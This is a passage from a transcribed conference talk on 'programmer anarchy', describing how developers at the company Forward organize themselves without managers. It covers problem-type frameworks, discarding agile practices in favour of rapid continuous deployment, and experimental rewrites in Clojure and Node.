problems. Complicated, there's still a cause and effect relationship, but it can be quite obtuse. It could be a long chain of events to get to there. But he said that's not all the type of problems there are. He said there are actually problems where there isn't a cause and effect relationship. That you can't discern this ahead of time. As much as you want it to be, it does not happen. And he called these complex, not the best word compared to complicated in my mind, where you can't see the effect. Now you might be able to look afterwards, something happened, and say, oh, this happened because of this reason, but it gives you no valuable information for tomorrow's decision. He says there are problems like this. And he says there's chaotic ways. You have no idea what's going on. Now I found that kind of interesting because to some degree, he really points out that almost all the problems, 85% of them, he says, start out in what he calls disorder. You really have no idea which of them it really is. And you said your tendency, unfortunately, is to claim that it's like the one you like to work in. So if you're a politician, oh, I'm sorry, every problem is simple. So let me, I make it work. You give us money, we'll make the banks happy. It's just very, it's a very straightforward problem. It's not hard at all. Of course, it's not true. But the tendency is to sort of drag it to where you want it to be. So essentially you have to be very careful. If you're comfortable with a particular type of problem that you like solving in one of these classifications, you will tend to look at every problem and say, oh, it's just like that. It's simple. Or it's complicated. Or maybe you love the chaos. You say, if you're very careful, there's ways to look at a problem and measure it and analyze it and it will tell you what type it is if you listen. So again, some nice videos on that. There's another video that I actually found quite useful and he said, oh, by the way, different organization structures match these type of problems. The organization structure itself is relevant to what type of problem you're trying to solve. And so as I look at this a little bit, I drew some pictures for you guys. Simple. That means it's a causative effect relationship. OK. This is where you get a bunch of guys. You give them a little bit of training. Put some managers up there who really understand it. Make sure they do better and better. You can measure them. You can count them. You can make them go faster. This is the world of simple problem. So this is actually the correct structure for working in simple problems. One of the things Ford has is they have a call center. Our call center is actually organized this way. It turns out that's the right way to organize it. What about some of these others? What complicated, remember complicated, this causative effect relationship is very obtuse. It's very long, long-winded at some level. So what they suggest is you need experts because they understand the cause of effect relationship. Of course, experts are expensive. So in order to execute the ideas of the experts, I need to put those grunts back in place again. We'll tell them actually how to do it. But the experts will tell you how to do that. Now this is beginning to look like architects and developers. That for certain problem domains where it is complex like this, this actually is the correct organization structure. But tiers of expertise in place. You basically want the management then to make sure they just execute what the experts tell you to do. Don't worry about it. Whether you're just right or not, the experts have told us this that way. Now you move over to complex, remember there is no cause of effect relationship here. There are no experts. What you wind up having is you basically just want to turn a lot of bright people loose saying make it work. Make me some money today. And they've got to be very catalyst about this. They could pull this lever today and move main money. Pull it tomorrow. Make more money. Pull it the third day. Loss money. Ooh, stop pulling it. They just have to have almost no memory about this stuff. In other words, I can't create this expert. And so there's no reason to have some sort of manager telling you experts how to do the work because he doesn't know either. They don't know. Now a lot of problem domains fall into this. And in fact, this tends to be the area where we as forward like to play. We play in this area because it's hard. We play in this area because when things are hard, the opportunity for profit is very, very high. When things get to be routine, like you can move over to complicated and just have to have experts to tell you what to do, then all of a sudden the profits tend to drop in these sort of domains. This is sort of economics 101. So it turns out most of our problems we tend to solve tend to be in the complex domain. So hence some of the things we're getting to is because we're trying to solve this sort of problem. So where do we fit in the agile scale? Well the agile manifesto is just celebrated as 10 years anniversary. I didn't realize actually that Uncle Bob actually called the original conference for that. I was at the conference the year before that. But we come up with this and we all believe this. I mean this is fundamental to how we work as well. So we believe in the agile manifesto. My favorite list of things is actually from Kent Beck's books about sort of what I would consider to be the XP values, feedback, communication, respect, courage. These things I think are very powerful. We love these things. And then you get to a list of the various common XP practices, stand-ups, narratives, estimates, patterns and the like. Well it turns out this is a list of things we don't do. So how do you handle the agile manifesto? How do you say yes to that? How do you say yes to the XP values and then cross all these things off the list? This is what I'm here to tell you about as we're trying to solve these complex problems. So I got gray hair. I've been doing this quite a while. One of the things I've seen across my career is a shift in trust between ourselves and our customers. And we certainly had that a long time, you know, a great, great extent back in the dark ages. But more recently, especially since we put waterfall in place, to some degree I feel the trust relationship has gone downhill. Now part of this is because yes, applications got bigger, we started doing things offshore, customers got no demand because of the environments, lots of reasons. But some degree the trust between ourselves and our customers was getting worse and worse. It was more like sign yourself in blood, you're going to be absolutely committed to this and your job's on the line. All these sort of words are driving the trust the wrong way. What we found out though is when we moved to Agile, we started trying to reestablish that trust. Then we started having conversations with our customers. But there's a gap there. In fact, one of my colleagues pointed this out and says, this is gap between all these things. And when I say Agile, by the way, you put any label you want to on it, I think we re-labeled this all the time, sells more books, causes more conferences. But in fundamentally it's basically all the same sort of thing. It's about constant feedback, about getting your customer face and really understanding what they want to do. But there's a gap there. And you call it sort of a cultural gap. Because to some degree the organizations that are currently waterfall cannot automatically do anything. Remember there's a gap there. They want to be effective at Agile. You have to have a certain level of trust with your customer. But they're down there. They're not ready to take that leap. I've done a lot of consulting in Agile space over the last decade. And the only time I can really make this leap successfully is when the company is in deep trouble. Because they're forced to trust me because otherwise they're going to go out of business. Or the guy's going to lose his job. Or one of these other nasty things is going to happen. That becomes a very receptive customer. Because I have to bridge this gap. When I try to work with successful companies, it's making a lot of money and they're down on the waterfall curve, it's almost impossible to push them up. They don't want to go. They're making money. Why should I take this chance? There's a thousand reasons. But there's even more reasons. Because to some degree waterfall has baked in structures into the organization that makes it difficult to move into this Agile space. So we talk about a couple of those. For one thing, I'm going to try to interact with the customer a lot. They're used to me actually saying, oh, what do you want next year? Here's my next delivery date, June next year. What would you like us to do for June? Write it all down in a document, sign it in blood and go away. Now why do they do it that way? Well it turns out that's what we taught them to do. We as programmers taught them that's the way you should interact with us. Tell us what you want and go away. We don't want to be bothered anymore. Trust us we'll deliver it. Of course the trust is going the wrong way. So we're going to interact a lot more with you. We want to do that. That's different for them. It's like, what are you going to do next June? Don't worry about June. What about next week? What do you want next week? Well, I don't know. I have to check. It's like, no, no, I need to know right now. It's a whole different style of interaction. Obviously it hits your process books. You've got books and books about how to do process. All those kind of go out the window. And interestingly enough, we also begin to have fewer roles. We have tons and tons of magic roles. I was with one client, they had 350 people in the IT shop, 180 job titles. That spawned from the waterfall world. Now they knew that was wrong. And they were radically revamping that to be five. And it was applauded their effort because they really didn't understand how ugly that was. So let's get an example of that. When I talk about agile, I generally define that there's three major roles of that. There's management roles, there's business roles, and there's development roles. And we have lots of titles for people that we sort of stick in these various categories. Project manager, iteration managers, you know, business analyst, customers. I always put the QA guys in the business side because they're always testing at the business level when they're doing their acceptance test. And there's just tons of titles for developers. They just, I could write all day long new titles for developers in various sundry ways. With agile though, we've done a pretty nice job and Scrum talks about this originally with the concept of there's only team members. And we took all those roles and we kind of stirred them into just one big role called developer. And a lot of agile shops, as they get mature in their agile, you know, they should begin to shed the titles. I was certainly saying in my company now, nobody knows what everybody is. Somebody has a title somewhere in the database. Nobody knows what they are and nobody cares. That's very much how we're working. So how does this stuff we're doing in Fort, map to this? Basically the way we're working now, we require yet a higher level of trust for our customers. We're asking our customers to trust us even more than they trust us with agile. And we basically have created yet another cultural chasm that we've had to leap over. And it's been somewhat painful sometimes, but we've managed to make that leap. We're asking them to trust us more than ever before. Now why is that? So let's go back to our agile roles, just as a starting point for examples. So you know, these are good agile roles. We have customers, project managers, business. So you really get down to a nice lean sort of agile organization. You'll see these sorts of titles. And yes, we have customers and we have developers, but we don't have the other roles. The other roles have gone away. Again that level of trust that we're going to need. In fact, even more in particular, we actually don't have any managers or programmers at all. You first of all talk about self-organizing teams. We're it. We do it. So pretty radical sort of thinking of an organization. Again, an organization that has people in these roles, going to have to have a trust to go up the next level. I mean, who's talking to the business? Well of course the programmers are talking to the business, but don't you need a business analyst in there to talk? No, no, I don't want that level of conversation. I want you to own the problem. And so we've done that. So there's some names for this. This is not the first time this sort of happened. This was, I think it's actually the all-time worst name, developer-driven development, 3Ds, right? It's actually pretty good description, but it's just a horrible name. More accurate is a bit called open source business model. If you ever work with open source projects, I'm sorry, who's the project manager? Where's the BAs? Where are the testers? Basically it's a self-organizing group. Develop some of the developers own it and other developers are contributing and they may gate themselves up, but they may add somebody's contributor and make somebody decide they don't want to play anymore, they drop out of it. It's a very dynamic organization and yet very effective. So it's a pretty good analogy to that. I've chosen to call it programmer anarchy. We can talk about later maybe why that was a good or bad name, but why do I choose the word anarchy? Well, to some degree, again, I've been around a long time, I've heard the word empowerment all my career. Oh, you're empowered to make these decisions. Some of the speakers I've heard about this week talk about that and how that's not a real thing and I believe that. Somebody's got to give you that. But if they give it to you, then they can probably have the power to take it away. You're always learning over that boundary is between the two. Where is that point where I'm going to step over the line all of a sudden, no, I can't do this anymore? And it sort of leads to, well, can I do this and you start asking permission rather than just acting? I don't want that environment. I don't want the uncertainty associated with that. I don't want the idea that empowerment is just a way to say, oh, I'm going to blame you if it doesn't work because you were empowered. I don't, somebody says you're empowered. I'm like, uh-oh, you're trying to find somebody to lay blame on. And in fact, a lot of times that's what happens. So I call anarchy. Well, in anarchy, there's a concept that says there is nobody to ask. So where's the boundary? Wherever you want to put it. Now there's a corollary to that. If I can't ask, if somebody can tell me what to do, then by the way, I can't tell you what to do either. Which means all of a sudden you and I may not agree. Well, government, how are we going to resolve this? The answer is why bother resolving it? Let's just go with it. If you don't like how I'm doing it, you do it. And we'll both do it. We'll see who wins. But there's nobody to ask permission of. So we expect to have disagreements. We are not trying to resolve them. If you want to try to resolve all the disagreements, oh, you should not use Ruby. Oh, no, no, you should use closure. You want to try to resolve these, you've got to put somebody in charge. And then of course they're going to set rules and boundaries and all of a sudden you're back in the waterfall. You can creep back there very, very quickly. So that's why I call it anarchy. And of course anarchy in the classic definition of anarchy means an organization who organizes themselves. An organization that's not imposed upon them from the outside. There's a really interesting book called The Invisible Hook. It describes the organizations of pirates. Forgive me, pirates were not organized. It wasn't a pirate manual. There wasn't some country saying this is how you have to organize your pirates. And in fact pirates had a very sort of dynamic organization. If you were traveling from spot to spot, there would be one guy in charge who's really good about organization and navigating. When you're lashing to that ship and trying to attack it, there's some giant guy with a bunch of swords that's the guy now in charge. And they would dynamically float the organization accordingly. So they were in every sense anarchists at that level. So how do you match up the work to the people in this anarchy environment? Well to some degree, I go back to some tools I used to use when I was doing more agile projects. I always tried to match up the people to the stories. Now I don't do this at iteration planning time. In fact iteration planning is gone from my vocabulary. I haven't done it since iteration in about three or four years. So what I like to do is I like to every morning I stand up, match the people to the projects. So what stories are the most important things? I want to judge that every day. So we go to our card wall, we look at the stories up there. I look at it and it says, okay, what's the most important story to work on? Okay, it's that one. Okay, next thing is who showed up today? Because I have no idea that you're going to get sick tomorrow or you're going to die or you just don't want to show up to work. I have no idea what's going to happen. If you show up, I want to put you on the most important thing that you could possibly work in. So I match the work to the people on a day-to-day basis and do that at the stand-up meeting. That's what the stand-up is all about. So let's see who's there, let's hear about what happened yesterday and then let's decide the work. I don't want somebody in the stand-up to come up and say, oh, I'm going to work on this today. So no, no, no, stop. Let's see what's the most important thing to work on. It may not be the same thing as yesterday. Let's judge that on a day-to-day basis. So we want to be fluid in that way. So we kind of extended that model into anarchy as well. So basically we say now instead of having stories to work on, there's various projects in our organization. So you can see from the little logos, we have easily eight or nine projects. In fact, we probably have twice or two or three times that many going on that haven't surfaced yet. So there's lots of little projects running these covers. The priority of those projects is set by the business. In fact, our managing director at some overall level says this is more important than this from a business perspective. We as developers respect that. On the other hand, who should work on any given project? It turns out the business owners are not the best people to decide that, oh, you're the best database person. Come work on the project and I need your web skills. Programmers know who the best people are. They know the best people are. And none of that, they probably know when they can roll themselves off much better than the manager. So don't let the project business owner sort of decide on his magic spreadsheet, oh no, I can't let this guy go because he's a one in my spreadsheet and I have a bunch of ones and they add up to six and I need to keep six. We've killed that spreadsheet arithmetic, the spreadsheet nonsense. People don't need to be there anymore, they should go away. And that's what we do. And we call this a resource rumble. Rumble is a slang term in the US for sort of getting together and having a fight. You know, it's two gangs going to get together, we're going to have a rumble. Nobody gets killed. But we have an interesting discussion, what's the most important thing to work on? And we sort of have that dialogue and we talk about who we need to slide over and maybe some skills we're missing. That's a discussion we have. And we have that almost on a weekly basis and we have it ad hoc all the time. So we decide what the priorities are and with that the programmers can go around and organize themselves around the most important things for the business. So that's how we assign the work. Again, who is, who makes the decision about who works and what project? The developers themselves because they know their skills the best. Okay. So some side effects of this. I have something I call story tyranny. So let me describe how the environment looks like. Developer is driven by stories. The stories are small. Customer decides what's the most important thing to work on. We estimate things by stories. We measure stories. We count stories. It's all about the stories. We estimate, we start talking about velocity. It's all about the stories. So sound familiar? Hopefully. Problem is this is the developers in that environment sort of become drones. They're not really worried about the business problem. They're going where they're told to. If I have an idea about doing something, no, no, no. This is the most important story to work on. I need you to work on the story. But this may be a bad idea. No, I'm sorry. It's not a bad idea. It's my idea. I'm the customer. You can have a vote. Do it the way I say it. Do it. Well, I think we need to explore this option. Oh, no. No, no. Don't explore options. This is the most important story. When are you going to have it done? Story tyranny. In fact, we were getting to have some of that in the organization. And that drove a lot of the changes we had in our processes because I was watching this. And these guys were not happy developers. They were in agile space. I was supposed to make them happy. They were not happy. So story tyranny. So interesting enough, I go back and again, sort of draw conclusions historically, we have shifted the responsibility for making decisions radically. I can tell you, in the dark ages of waterfall, the trust relationship just did not exist. The customer said, do you do this? There was almost no feedback mechanism. Because first of all, it was usually months and months between the time that some guy wrote a spec and signed it off and the time I actually saw it as a developer. And we'll be done to you to try to go back and question one of those things. Imagine the meetings and the reviews and we're going to write some new documentation. When is it going to be ready? And can we have another review of this stuff? It's like, you try that once or twice and you as a programmer stop trying that. It's just like, tell me what to do. I'll just do it. That was the world I grew up in in waterfall. Now we moved to much more collaborative, almost constant collaboration with our customer in the agile space. And this is responsible in my mind for a lot of the improved delivery, delivering more with our customer once and the like. Well, it turns out though, in anarchy, we flip it the other way completely. We want the customer to say, what are you trying to accomplish? Get out of my way. That's where the extra level of trust is required. That they're not going to try to micromanage what I'm working on. They're not going to try to decide you have to have stories. They're not going to ask for story estimates. They're not going to track me on stories. They're going to say, here's a feature I'd like to have. The business has set some priorities between the various projects. And it's like, okay, get out of my way. We're going to make it work. We may try some experiments. We may do some other stuff, but get out of my way. We're going to do it. Another level of trust. Just to get an idea of how this works, of course the anarchists themselves in forward have their own website called Forward Technology Co. UK. There's a lot of nice information on that. They do have their own little tech conferences every month. They get together and have some beer and pizza and present to each other like in a technical conference. And I can tell you, some of the presentations are extremely strong and very informative. So one of the things they do is they actually track through GitHub how much they're doing. And so I think this is a week I snapshot a month or so ago. It says, the last seven days, 53 developers have made 882 commits resulting in 652 deployments in that week. Do the arithmetic. In your 40-hour business week, they were deploying on average every three and a half minutes. They were putting something live into production. This makes the trust relationship work very nicely because they're constantly delivering to the customer. He's seeing what it is. We're trying experiments. The cost of an experiment is considered very low. Let's try an idea that's fine. It works. It doesn't work. They're constantly producing and delivering. So that turns out to be a very key aspect of making this work is how fast can I deliver. Now you take all of the agile practices and various processes, you know, starting with Scrum at one end and this cycle time, and you sort of get the XP and this faster cycle time. One of the things I've seen over the last dozen years is the cycle times for agile are getting faster and faster. But also, we're having more and more role collapsing. I can't go really fast if I have to go talk to him and him and him before I get an deployment done. So hence, the teams are beginning to blur a little lines. The line between myself and my operations team is now completely gone. There's no operation guys responsible for deployment. They're only embedded into the development teams. They write code themselves. Developers deploy. Welcome to Amazon Cloud. Welcome to Heroku. I mean, it's not that hard anymore. So we take advantage of that because we want to go fast. If it makes us go faster, we will do it. So let me give you some examples of anarchy in action. So USWH was one of our acquisitions. We bought that company, well, I guess two and a half years ago now. They had a classic.NET stack. I mean, web servers, app servers, SQL servers. They had a farm of machines. They had extra machines in case for heavy loads. It's supported the energy market. It turns out the energy market, if you get some bad energy news like, oh my goodness, prices are going to go up, our website gets an order of magnitude increase of traffic. So we had to allocate machines for that. And the trouble was, it was getting a little old because this is the company we bought was actually 10 years old at the time. And what really worked nicely back then wasn't working so well. In fact, programs were afraid to touch it because it might impact this and impact this and impact this. And we were doing some very strange things. And our cycle times were horrible. So we decided we need to rewrite the energy program. And we call it energy revolution versus rewrite because I don't want the same architecture structure, I want a different structure. So we basically went and grabbed a couple of guys off a team we really liked and took this.NET SQL system. Now one of the things that I was taught in business school, and I do have a business degree, is that you always have to watch out with technology. You got to be careful not to introduce too much new technology to a project. One new technology, fine, two, okay, maybe. Any more than that, you're going to kill yourself because the technology will come up and bite you. So with that in mind, and with the.NET background SQL server, what do we do? Well we build a new system in four different new languages, use two different new databases including a non-SQL database, and a whole different way of doing pages. And never missed a beat. There's no way if I was in charge of this project I would have ever let this happen. It turned out it was exactly the right thing to do. We started using Ruby for front-end work. We started using Clojure for back-end processing stuff. We used a little C++, you know, mixed in where you need to grab an external service, and that was the best way to do it. A lot of traffic monitoring with Node.js. By the way, the programs were enthralled with this. I mean, I get to play with my favorite toys. I get to try new things out. They were absolutely delighted in their productivity. It was amazing. Never missed a beat. Another example from Energy Revolution. Again, remember, we're trying to rewrite this system. That's the goal. It's a 10-year-old system. So one of the things we have to do is we have to calculate the energy options you have to switch energy plans. And it turns out in the UK that it depends upon, well, what's your history of energy usage? Well, where do you live? Because every energy company has different plans for where you live so they can optimize their profits. What plan are you currently on that may or may not be a good deal for you? And based upon that, we'll come out with a list of these plans are appropriate for you. So a good, nice function. We wrote that in Ruby. It used to be scattered across all of the.NET layers like it was supposed to be. You could never find the algorithm. We managed to tease it out. It's like 600 lines of Ruby code. And there was a huge improvement because there it was. There's the algorithm that figures all these things out in one spot. So of course, at that point, what do you do? You rewrite it in closure. Because the guy's heard about closure, he said, oh, it looks like a function. This looks like a function. I'm taking this arrays of information. And besides, you get some more arrays. Sounds like Lisp to me. Let's try it with Lisp. And we wrote it in closure. And lo and behold, it was smaller. It's like 300 lines of code now. So what do you do now? You write it again in closure. They said, well, excuse us, but we really didn't know how to use closure very well. That was not necessarily good news to hear. But OK, we don't know how to use closure very well. We can rewrite it again. So we rewrite it again. Now it's only 200 lines of code. Now it actually does something the old system was supposed to do, but never did. And it's absolutely gorgeous. It's absolutely clear. In fact, we put this code under load when we had one of these big energy spikes. The big energy spikes started taking down our.NET farm. We were hitting things in much harder than we ever expected to. And we started rerouting the traffic over this calculation engine. So running on one virtual machine in an Amazon cloud, it got all the way up to 30% utilization to take all the load that the other six machines were dying on. In other words, it was absolutely the right decision to make. Programmers made a great call in writing it that way. So the question I have is, what manager in their right mind charged with rewriting the system would let a programmer rewrite this thing three times? The answer is, that's why you have no managers. I was giving this presentation the first time at a conference, a very small little conference and some very bright people. One person just stood up and said, I mean, why did you let them do that? He said, exactly. I would not have let them do that myself. I confess to that right now. I would not have let them do that. And it was absolutely the right call. All right, one more example. We make a lot of money off of understanding where people are clicking. I mean, that's all about internet advertising. And we actually run this, you know, in the current system, the old system, we ran this in a Ruby-based system, we wrote some Ruby code, 32 different servers in the cloud, 40% utilization. It's making us lots of money. In fact, the system goes down, we're losing 200 pounds of profit a minute from this thing being down. So, it's a very important system for us. So, of course, what do you do is you rewrite it. We wrote it in Node because we want to play with Node. It sounds like a good idea. In fact, Ruby has some trouble when you're trying to get to several inter-Asian languages. It has some problems with some of that stuff. JavaScript doesn't have that problem. So now all of a sudden we reduce the number of servers, now we're down to 22 servers. The utilization went way down, even on this smaller number of servers, and even more important, the latency actually dropped. So, again, why would you do this to your running system? It's not that old. It's only a few months old itself. Why would you rewrite it? It turns out it's a good call. Progurr has made a great call again. So you're getting a sense for just how strange some of these things are to turn them loose. They do things you would think were counterintuitive, but you need to trust them to do that, and that's what we're doing. So, some of the things we have in our company that sort of makes this happen. So I call these the enablers. I don't think this list is everything you need. I think you can do it with less than this list is showing. But these are the things we have going forward that probably contribute in some way to doing this. Overall, arching in my mind is this phrase from Frank Herbert in the Dune books. Fear is the mind killer. I truly believe that programmers that are afraid will not make innovative decisions. They will hesitate. They'll take a conservative way. They'll back away from the problem. So you try to eliminate fear. Now, fear can creep in in very strange ways. In fact, even some good advice from various Agile experts I think is horrible. For example, in the original XP book, they say you should make a story-level estimate at the beginning of an iteration. And I'm like, oh, what a bad idea. Well, what does that mean? Well, here I go to you and say, OK, tell me how big this story is going to be. You're going to own the estimate for this per Ketbeck XP. Well, how big is it going to be? You're saying, OK, we're going to pair with this. If I pair with the idiot over there, it's going to take me five days. If I pair with the wizard over here, it's going to take me one day. What am I going to say? I'm going to say one or say five. If I say five, they're going to say, I'm an idiot. If I say one and I get stuck with the idiot, I'm going to fail. So what am I going to say? I'm going to say, OK, we're going to pair. So what happens next? OK, we're starting the iteration. Here, come work on my story, because I want to make sure mine gets finished. Even though it may not be the most important story, come work on my story. Trust me, I'll come work with yours when we're finished with my story. Again, not good, you know, alligational resource. All because I asked the question of, tell me how big this is going to be. You own this. You're responsible for it. You're empowered to give it, to make the story work. It's fear. So when I see fear in an organization, I can almost guarantee it's created by process breakdowns. You can trace it back to some of those questions. One of the things I actually work on very hard is, when you ask me a question, I want to know how you're going to use the information I'm going to give you back. What are you going to do with this? I had an occasion where we're doing a fixed price project, and we have part of our work being done in India. And the client sends some sort of guy over to our team and says, okay, I need to know who's working on this project in India. Okay, it's like, okay, if I tell him this, it's probably going to be yet another question. He's probably going to try. It's going to be another question. So I'm like, what do you need this for? How are you going to use this information? Well, I don't know. He says, when you know that, come back and ask me again. His manager shows up. I need to know who's working in India. I'm saying, yeah, I'm not going to use this information. Not really sure. When you find out, let me know, I'll give you the answer. Never came back. Now, I can guarantee if I told him the answer, they'd probably done some calculations in the back office. They figured out how the rate is I'm getting in India. They would try to renegotiate the fixed price contract. I mean, they're not being meetings for the next four months, trying to get this thing straightened out, all because I answered a question without knowing how they're going to use the information. So be very careful about such things. So fear is the mind killer. So one of the things I'd spent a lot of time on with that organization was trying to find the fear and kill it. All right. So what happens about our company? So one of the things about our company you should understand is we love taking chances. We're gamblers by our very nature. Our founder is a gambler by his very nature. I think that's why he gets the excess profit. He's always willing to risk. He was originally bought keywords back in the dark ages. He would know he'd go find 10 keywords to bid on on Google. The eight of them are going to lose money and two are going to be successful. And it's all about finding the two as fast as you can and killing the other eight. So he's used to very, very low success rates. He's willing to gamble because he knows the returns are good. That's his nature. And frankly, we're making a lot of money, which means you can hide a lot of mistakes. When mistakes happen, it's like, oh, well, let's try it again. Again, just roll the dice again. So that is part of our culture. We're risk takers. And that enables a lot of this thinking. We have become very developer focused. When I joined the company, I was actually the first experienced developer they'd ever hired. And then we started hiring more. One of the things we have as developers is we now have very clear ideas of what success means. And our world's success is business success. So as we bring people into our team, the first thing we care about is, okay, what's the business metric? So making money, is it clicks, is it response time? What is the measures metric? That's what we want to see. We measure against that. We worry about success ourselves. That's part of our culture. In fact, we put those charts up in big places. We measure them ourselves. The first thing we come in every day is how much money we make yesterday. Programmers ask these questions. They care. The other thing is, we respect each other, which means these disagreements we have, we can have them and still go out later and get a beer together. It's okay. We do respect each other. Now, how do you think we hire in this environment? Well, the only people who can decide who's going to join the programming team is the programming team. That's what Anarchy is all about. Now, an interesting thing happens when you start eliminating titles and you start wiping and you have this sort of hiring model that says, programmers pick their colleagues. Well, if you really do like to learn, who do you want to hire? I want to hire this brilliant guy over here because I can learn something from him. What if I'm in a title world? If I'm in title land, I want to hire somebody over there who's not very smart because he's going to make me look better and I get promoted. Now, from an organization perspective, do you want the really bright guy or do you want the really idiot? With title world, you're going to tend to want to pick the idiots. We want to pick the bright guys. So, almost all the interview processes, we're trying to see if you know something we don't know. If you know something we don't know, we want you to come join us because this is cool. So our hiring is along those lines. Again, of course, I respect you because I wanted you to come join us. You got things that can teach me. The programmers themselves work in a fashion. In fact, the programmers themselves came up with this concept. They call it experimentation drives innovation. That's their way of expressing themselves. I love that because by its very nature, experimentation means failure, constant, constant failures. It's expected. We don't get upset when it happens. Therefore, we drive everything else. Through my favorite, do or not do, there is no try. Yoda, good philosopher that he is. If you're not feeling you're not trying, all these things are sort of along the same lines. We expect failure. At any given point in time, probably two-thirds of the developers are experimenting on something that may remain in the next money. In fact, most of the cases will not make us money. We've lost our productivity for that day. We don't care because when they win, we win big. We've had a lot of wins. Finally, we actually hired a VC into our senior management team because we were making a lot of money. We wanted to try to find other places to invest in, other sort of businesses to get into because we, again, we don't care what businesses we're in as long as we get a chance to innovate. He started out his presentation. The first time he was introduced to the people saying this, the greatest barrier of success is fear of failure. He came back to the fear issue as well. So at the top level of the business, they really do believe that fear is a problem. And failure should be not only, not only happened and acceptable, it should be expected that we will fail in various things we try. So those are the cultural enablers that allow us to play these very, very strange games. So if I go back to the best practices, you can begin to see why some of these things get scratched off the list in this environment we're in. So first of all, you can sort of scratch all these off because basically the programs themselves trust each other. They're very outspoken with each other. I don't need a whole retrospective to give them a chance to sort of say they don't like something. They'll say it all the time. They don't like it when you say, well, why are you asking me? Why are you doing this anymore? You're doing something else. And they change their minds. Even concept of stories. Remember, I'm reversing the power structure here. As far as I'm concerned, the business is saying this is my objective. This is a feature I think we should have. And the program is saying, OK, if that's what you want to have, let us figure out how to make it work. If we want to create stories, we'll create stories. If we don't want to create stories, we won't create stories. This is our problem to manage. So formal stories and those sort of things. Stand up. That's just a chance to make sure we talk every day. It's a great tool to make sure your team talks once a day. If they're talking all the time, you don't need stand up. In fact, if there's any word that sort of, any meeting is basically not a productive exercise. It's something that's a crutch for something that's broken. And that includes retrospectives, meetings. It includes stand up meetings. It includes iteration planning meetings. If you're really running effectively, these things will fall away in the due time. Let them go away. All right. Estimates, iterations, mandatory pairing. Again, a lot of this is associated with making sure we know who to blame when it doesn't work. So we come back at iteration. Well, how many stories should get done? I can't tell you how many clients I've had. It says, oh, we should get 12 stories done this iteration. We come back at the iteration. We get 10 done. So how many should it be the next iteration? I'll tell you, the project manager will say 14. The 12 of you are supposed to get done and the two you owe me. And I'm saying, excuse me, this team does 10. We just learned that. You aren't going to use that. No, no, not 10, 14. Again, something you don't need creates fear. Just idiocy at some level. So we don't have those because we're not, we're very results oriented. We're looking at the business metrics. And do we have a win yesterday based upon the business winning? Not based upon any other metrics, story points, anything else like that. So they'll go away. If you happen to attend my talk on Wednesday where I talked about microservice architectures, you sort of understand why I scratched all those things off. Our applications right now are extremely tiny. We typically write, most of our applications are probably 100 lines of code. It's hard to get 100 lines of code wrong. If you can't get 100 lines of code, you're in the wrong profession. And what if I write 100 lines of code and it's something wrong with it? Well, rewrite it. Throw it away and start over again. I don't need the unit test to show me what I'm breaking if I make the story change. I just rewrite it and deploy it. And the business metrics will tell me whether it works or not. So all of a sudden now architecture has eliminated a lot of stuff that's overhead. To some degree, testing is not lean. It's extra work you're doing just in case something goes wrong. Every time you say just in case, you're not lean anymore. What you're really trying to trade off is fast feedback versus defect prevention. Testing is defect prevention. Fast feedback is preferred. So we deploy constantly. We just put it out there live. Well, did anybody look at it? No? Is it working? Yeah, okay, we're fine. So not working, we have the business metrics just this way. Fine, let's take it back off. Business metrics told us this must be a bad idea. Let's take it back off. And we'll rewrite it. I'm picking this piece of code up, it's enclosure. Oh my goodness, I can't read closure. Fine, we're writing Ruby, I don't care. It's like writing like, it's underlines the code. It's got a JSON interface, accesses MongoDB. I don't care what language you write in. I'll write it in Visual Basic, I don't care. And so you have these flexibility about that. Of course the programmers don't tend to use Visual Basic, they tend to use their latest cool language. They get excited by it, they try it out, we learn things. We get happy with family. Continuous integration, well of course that goes away because we're doing continuous deployment. I've always tried, I think, continuous deployment is kind of the holy grail. Putting something live every three and a half minutes, very cool stuff. So that one sort of goes away. So now you can understand why we say we're agile because we believe in the agile manifesto, we believe in feedback and communication. All these things are true, but these practices actually have slowed us down a lot of ways and we started discarding them. And I can tell you the first time I heard that we were running a unit test, I was going like, but how can you get away with that? And it's like, what's our lines code? I'm like, but, you know, and it turns out they're right again. I should say that, of course, I, I'll actually say that later, so I'll save that one. Yeah, this is a reality check. So this wraps up, that's part of the story. First of all, Anarchy has been implemented by a different extent by every team. Well, first of all, it's Anarchy. You can't dictate how Anarchy works anymore. You can tell pirates how they're supposed to organize. So we let the teams basically figure out how they want to do things themselves. And they, again, the teams stir themselves around periodically. Good practices tend to move around pretty well. Bad practices tend to be identified quickly. And some degree that's based upon their talent and experience and some degree they're apprehension. So there's always a little bit of fear for new guys coming in about what are you allowed to do, what are you not allowed to do, where's the manager, who's going to sign this off. They ask these silly questions and it's like, nobody, but, but I need to do a laptop. So go get one. But it's expensive. I don't care. You think you need it? Yeah, well go get it. Why are you asking? And it doesn't take very long before they get the idea. I would say even our best anarchists will turn around and try to ask permission occasionally. And we always say yes. And then we ask them, why are you even bothering to ask me? Even our managing director is very cool about that. And the summary I think is true that commercial success is driving success. I do believe that with our particular managing director we have, he's actually now 33, I think. He's a gambler anyway. I think if we were losing money, he would think the only way I can ever make money again is probably continue to do crazy stuff like this. I mean, he is of that nature. But it does help to make money because nobody actually will question that. I should also acknowledge that fundamentally I am not the guy that came up with programmer anarchy. I will claim responsibility for the name. We can talk about why that's an interesting name, but I came up with a name. So really it was actually watching these guys actually do the work. We got some very young guys that are doing this. Mike Jones is the one who wrote the closure the second time. He had a new baby. He was at home. He was getting bored, so he wrote a new version of closure. Don't know how his life looks like, but this is an interesting world. But they did that. And to some degree, we are enabled by two individuals. Carl Gaywood, no university degree. He's 27 now. He's the one that's making most of our money. Neil Hutchinson is our founder. He's now 33. They had an interesting conversation one day. Carl is making all this money, and Neil is looking at it and says, oh, you're making a lot of money, Carl. And hey, you need some more programmers. And Carl says, Neil, I don't think I need any more. I don't know what to tell him to do. He says, Neil said, take them anyway. So he happened to be Mike Jones and Paul Engels and those two guys. So he took some guys and lo and behold, he makes more money. I mean, a lot more money. So they have another conversation. And Neil says, Carl, take some programmers. And Carl says, I don't know what I'm going to do with them. I don't know what to tell them to do. He says, I don't know. Take them anyway. Again, he makes more money. Okay, now think about the conversation. When was the last time the managing director was pushing resources to our project? Isn't it the other way around where you're begging for something and you can't get it? This guy's pushing it that way. That's how strange the culture is, to some degree. Now why did anarchy work? It turns out when I gave Carl these bright programmers that he couldn't tell him what to do, they figured out what they wanted to do themselves. They started experimenting. Hence, Boris born anarchy. In fact, Carl himself was the first anarchist. Carl was originally a programmer. And the first thing he did was when he joined the organization was like, I don't know what I did yesterday. I don't know if I made money yesterday. So he started analyzing Google reports and building little spreadsheets for that and did more and more of that. And the 